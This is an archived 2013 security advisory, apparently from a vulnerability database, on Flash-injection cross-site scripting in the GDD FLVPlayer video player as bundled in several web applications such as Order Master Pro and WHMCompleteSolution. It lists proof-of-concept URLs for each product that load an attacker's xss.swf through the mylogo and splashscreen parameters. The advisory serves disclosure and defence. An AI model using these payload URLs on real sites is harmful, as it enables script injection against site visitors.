Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29734
HistorySep 09, 2013 - 12:00 a.m.

Vulnerabilities in multiple web applications with GDD FLVPlayer

2013-09-0900:00:00
vulners.com
16
JSON

Hello 3APA3A!

These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications with GDD FLVPlayer. Earlier I've wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is video and audio player, which is used at thousands web sites and in multiple web applications.

Among them are Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer for MODx, Pixelfind Administrator, WHMCompleteSolution. And other web applications. Also this flash video and audio player is used at many web sites as standalone web application.

Affected products:

Vulnerable are web applications which are using GDD FLVPlayer v3.635 and previous versions.

Vulnerable are the next web applications:

Order Master Pro (all versions)
CMS Pask 3 (Pixelwerk admin v.3.3) and previous versions.
gddflvplayer for MODx (all versions).
Pixelfind Administrator (all versions).
WHMCompleteSolution (all versions).

Affected vendors:

GDD FLVPlayer was developed by GeDeDe.

GeDeDe
http://www.gdd.ro

Details:

XSS (via Flash Injection) (WASC-08):

Order Master Pro:

http://site/op/video/gddflvplayer.swf?mylogo=xss.swf

http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf

CMS Pask 3 (Pixelwerk admin):

http://site/gddflvplayer.swf?mylogo=xss.swf

http://site/gddflvplayer.swf?splashscreen=xss.swf

gddflvplayer for MODx:

http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf

http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf

Pixelfind Administrator:

http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf

http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf

WHMCompleteSolution:

http://site/player/gddflvplayer.swf?mylogo=xss.swf

http://site/player/gddflvplayer.swf?splashscreen=xss.swf

These are examples of XSS vulnerabilities, examples of 8 ะกS vulnerabilities see in above-mentioned advisory.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6727/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON